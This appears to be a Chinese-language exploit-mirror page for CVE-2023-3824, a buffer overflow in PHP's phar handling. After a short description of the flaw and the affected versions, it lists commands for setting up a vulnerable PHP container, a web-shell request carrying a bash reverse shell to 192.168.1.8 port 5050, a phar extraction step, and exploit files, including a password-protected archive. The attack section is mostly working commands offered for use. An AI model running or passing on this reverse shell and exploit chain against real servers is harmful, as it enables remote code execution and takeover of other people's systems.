POC详情: ac47b8a41b885643451235d9b9b86c3f1c6dfd1c

来源
关联漏洞
标题: PHP 缓冲区错误漏洞 (CVE-2023-3824)
描述:PHP是一种在服务器端执行的脚本语言。 PHP存在安全漏洞,该漏洞源于函数phar_dir_read()存在缓冲区溢出漏洞,该漏洞会导致内存损坏或远程代码执行(RCE)。受影响的产品和版本:PHP 8.0.30之前的8.0版本,8.1.22之前的8.1版本,8.2.8之前的8.2版本。
介绍
sudo docker run -it --rm -p 8080:80 php:8.0.29-apache bash
echo "phar.readonly = Off" >> /usr/local/etc/php/php.ini

http://localhost:8080/shell.php?cmd=bash -c 'bash -i >%26 /dev/tcp/192.168.1.8/5050 0>%261'

php -r "\$phar = new Phar('exploit.phar'); \$phar->extractTo('./', 'shell.php');"

exploit.zip
  pass: infected
文件快照

[4.0K] /data/pocs/ac47b8a41b885643451235d9b9b86c3f1c6dfd1c ├── [6.6K] exploit.phar ├── [ 368] exploit.zip ├── [ 782] index.php └── [ 322] README.md 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。